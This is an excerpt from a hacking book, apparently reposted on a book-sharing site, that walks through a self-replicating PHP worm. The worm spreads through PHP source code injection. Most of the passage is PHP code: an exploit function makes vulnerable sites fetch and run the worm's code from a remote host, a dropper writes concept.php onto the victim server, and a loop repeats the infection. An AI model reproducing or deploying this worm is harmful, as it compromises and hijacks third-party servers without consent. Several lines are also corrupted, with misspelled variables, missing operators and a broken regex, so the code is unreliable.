The Infection

The exploit($str) function takes one parameter: a string containing the URL of a page that might have a vulnerability of the PHP source code injection type.

The argument contains [ *STRING* ] as a value of a potentially vulnerable parameter.

In essence, attempting an infection is a matter of sending the http://sites/test.php?aaa=http://site2/concept.php?&bbb=ccc request instead of http://site1/test.php?aaa=[*STRING*]&bbb=ccc . Here, site1 is the URL of the site that the worm is trying to infect , and site2 is the address of the file currently executed.

So, the exploit() function could be as follows .


 function exploit($str) {   global $_SERVER, $HTTP_SERVER_VARS;   $th=$_SERVER ["SCRIPT_URI"];   if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"];   if(empty($th)) $th=getenv("SCRIPT_URI");   // Getting the URL of the site   if(!preg_match("/domain\.com/", $str)) exit;   $str=str_replace("[*STRING*]", "$th?", $str);   $str.="&from=".$_SERVER["SCRIPT_URI"];   file($str);   // Initialization is done } 

Here, it is assumed that when the script (the CONCEPT.PHP file) is requested without parameters, it returns some PHP code that will execute on the server.


 <? if(file_exists("concept.php")) exit;   // To avoid infecting one server repeatedly $f=fopen("concept.php", "w"); $a="<? // The source code of exploit.php ?> "; fwrite($f, $a); $th=$_SERVER["SCRIPT_URI"]; if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"]; if(empty($th)) $th=getenv("SCRIPT_URI"); preg_match("/^(https?\:\/\/.*)\/(.*?)/", $th, $r); $a=$r[1]."/concept.php?expl=yes"; file($a); ?> 

It only remains to write code that will display the result.


 $tmpname="concept.php"; echo "<? "; $th2=$_SERVER["SCRIPT_FILENAME"]; if(empty($th2)) $th2=$HTTP_SERVER_VARS["SCRIPT_FILENAME"]; if(empty($th2)) $th2=getenv("SCRIPT_FIIENAME"); echo " if(file_exists(\"$tmpname\")) exit; $f=fopen(\"$tmpname\", \"w\"); $a=\"".str_replace("$","\$",addslashes (implode("", file($th2)))). "\"; fwrite($f, $a); $th=$_SERVER[\"SCRIPT_URI\"]; if(empty($th)) $th=$HTTP_SERVER_VARS[\"SCRIPT_URT\"]; if(empty($th)) $th=getenv(\"SCRIPT_URI\"); preg_match(\"/^(https?\:\/\/.*)\/?{.*?)/\", $th, $r); $a=$r[1].\"/$thisname?exp1=yes\"; file($a); ?> "; ?> 

When the http://site/concept.php?expl=yes request is sent, it closes the loop and reproduction starts from the beginning.


 if($_GET["doexpl"]=="yes"  $HTTP_GET_VARS["doexpl"]=="yes") {   global $c, $_GET, $HTTP_GET_VARS, $_SERVER, $HTTP_SERVER_VARS;   initsettins();   searchandexpl();   // The next iteration   $countthis=(int)($_GET["countthis"]$HTTP_GET_VARS["countthis"]);   if($countthis==0) $countthis=$c; $countthis--;   $th=$_SERVER["SCRIPT_URI"];   if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"];   if((empty ($th)) $th=getenv("SCRIPT_URI");   if($countthis>=l) file("$th?doexpl=modeok&countthis=$countthis");     exit; } 

Hacker Web Exploition Uncovered
Hacker Web Exploition Uncovered
ISBN: 1931769494
Year: 2005
Pages: 77 © 2008-2017.
If you may any questions please contact us: